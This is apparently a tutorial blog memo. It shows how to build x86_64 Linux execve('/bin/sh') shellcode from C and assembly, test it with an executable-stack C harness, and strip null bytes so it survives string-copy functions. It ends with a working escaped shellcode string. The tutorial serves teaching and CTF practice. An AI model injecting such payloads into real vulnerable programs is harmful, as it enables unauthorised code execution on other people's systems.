Write your shellcode
This memo describe how to write (and test) a shellcode from the corresponding C code.
x86_64 Shellcode Link to heading
The shellcode will start /bin/sh. Let’s take the following C code :
#include <unistd.h>
int main(void){
execve("/bin/sh", NULL, NULL);
}
NULL
parameters stands for args and environment, we don’t need them for now.
It can be translated in assembly this way :
global _start
SECTION .text
_start:
xor rdx,rdx ; env
xor rsi,rsi ; args
mov rax, 0x68732f6e69622f ; "/bin/sh"
push rax
mov rdi,rsp
mov rax, 0x3b ; sys_execve (59)
syscall
; Quit
mov rbx,0 ; return code
mov rax,1 ; exit syscall number
int 0x80 ; syscall
Explanation of the assembly code Link to heading
Similar to C code, execve syscall takes 3 args. Here we don’t use the C function execve(), but directly the syscall, which takes the following parameters:
{.table .pure-table .table-striped .table-responsive}
Register | Value |
---|---|
rdi |
File name to execute |
rsi |
args |
rdx |
env |
(see: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ for details)
Both of them are NULL, they are set to zero :
xor rdx,rdx ; env
xor rsi,rsi ; args
Unlike C, shellcode can’t store strings in the data section, we have to put them on the stack.
- Put the string into a register
- Push the value of the register on the stack
- The string address is the current value of RSP (top of stack).
mov rax, 0x68732f6e69622f ; "/bin/sh" ( "hs/nib/")
push rax
mov rdi,rsp
Finally execute the syscall :
mov rax, 0x3b ; sys_execve (59)
syscall
Compilation :
$ nasm -felf64 -o shell.o shell.asm
$ ld -o shell shell.o
We are now able to extract the assembly instructions from objdump (or any other disassembler):
$ objdump -d -Mintel shell
The interesting part is :
401000: 48 31 d2 xor rdx,rdx
401003: 48 31 f6 xor rsi,rsi
401006: 48 b8 2f 62 69 6e 2f movabs rax,0x68732f6e69622f
40100d: 73 68 00
401010: 50 push rax
401011: 48 89 e7 mov rdi,rsp
401014: b8 3b 00 00 00 mov eax,0x3b
401019: 0f 05 syscall
The instructions are :
48 31 d2 48 31 f6 48 b8 2f 62 69 6e 2f 73 68 00 50 48 89 e7 b8 3b 00 00 00 0f 05
Test the shellcode Link to heading
With a little C program, we can test this shellcode:
#include <stdio.h>
#include <string.h>
char code[] = "\x48\x31\xd2\x48\x31\xf6\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x50\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05";
/* Could also be written : char code[] = { 0x48, 0x31 ....} */
int main()
{
(*(void(*)()) code)();
return 0;
}
Compilation :
gcc -o shelltest shelltest.c -z execstack
-z execstack
is needed because by default gcc make the stack non-executable, we can check this fact with readelf :
$ gcc -o shelltest shelltest.c
$ readelf -a ar | grep STACK -A 1
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
$ ./shelltest
Erreur de segmentation (core dumped)
RWE
for read/write/EXECUTE
$ gcc -o shelltest shelltest.c -z execstack
$ readelf -a shelltest | grep STACK -A 1
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
RW
Only
You have now a working shellcode.
Polymorphism Link to heading
In computer terminology, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. For example, 1+3 and 6-2 both achieve the same result while using different values and operations. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence.
https://en.wikipedia.org/wiki/Polymorphic_code
Why do i need polymorphism ? Link to heading
In some cases, we can’t use \x00
in shellcode because they are processed by strings related functions (like strcpy, which stops reading at the first \x00
it encounters). Sometimes some bytes are forbidden in CTF exercises, we need to get rid of these.
To remove unwanted bytes, we have to manipulate the assembly code, replace opcodes with others, remove some, add some. Here is an example.
Example Link to heading
Take the shellcode from the first part of this article, it contains zeros and will not be processed correctly by a string related function.
48 31 d2 48 31 f6 48 b8 2f 62 69 6e 2f 73 68 00 50 48 89 e7 b8 3b 00 00 00 0f 05
The first \x00
is here at the end of the string :
401006: 48 b8 2f 62 69 6e 2f movabs rax,0x68732f6e69622f
40100d: 73 68 00
We need the null byte to terminate the string. One way we can do this is by inverting the contents of rax and then re-inverting it in the assembly code:
Current RAX is 0x68732f6e69622f
If we apply the neg operation, it becomes 0xff978cd091969dd1
...
mov rax, 0x68732f6e69622f
neg rax
<breakpoint here>
...
(gdb) info registers
rax 0xff978cd091969dd1 -29400045130965551
No more zero in 0xff978cd091969dd1
New shellcode :
401000: 48 31 d2 xor rdx,rdx
401003: 48 31 f6 xor rsi,rsi
401006: 48 b8 d1 9d 96 91 d0 movabs rax,0xff978cd091969dd1
40100d: 8c 97 ff
401010: 48 f7 d8 neg rax
401013: 50 push rax
401014: 48 89 e7 mov rdi,rsp
401017: b8 3b 00 00 00 mov eax,0x3b
40101c: 0f 05 syscall
There are still zeros in the mov eax,0x3b
operation.
Instead of using mov, we can use other opcodes :
Set rax to zero xor rax,rax
then adding 0x3b (syscall number)
add rax,0x3b
Let’s check the final code :
0000000000401000 <_start>:
401000: 48 31 d2 xor rdx,rdx
401003: 48 31 f6 xor rsi,rsi
401006: 48 b8 d1 9d 96 91 d0 movabs rax,0xff978cd091969dd1
40100d: 8c 97 ff
401010: 48 f7 d8 neg rax
401013: 50 push rax
401014: 48 89 e7 mov rdi,rsp
401017: 48 31 c0 xor rax,rax
40101a: 48 83 c0 3b add rax,0x3b
40101e: 0f 05 syscall
48 31 d2 48 31 f6 48 b8 d1 9d 96 91 d0 8c 97 ff 48 f7 d8 50 48 89 e7 48 31 c0 48 83 c0 3b 0f 05
It’s done, no more zeros! You can use similar methods (and create your own) to remove all the unwanted bytes. At this point, the better you know assembly language, the easier you’ll be able to create your shellcode and use polyporphism.
Here’s the python-usable version :
\x48\x31\xd2\x48\x31\xf6\x48\xb8\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd8\x50\x48\x89\xe7\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05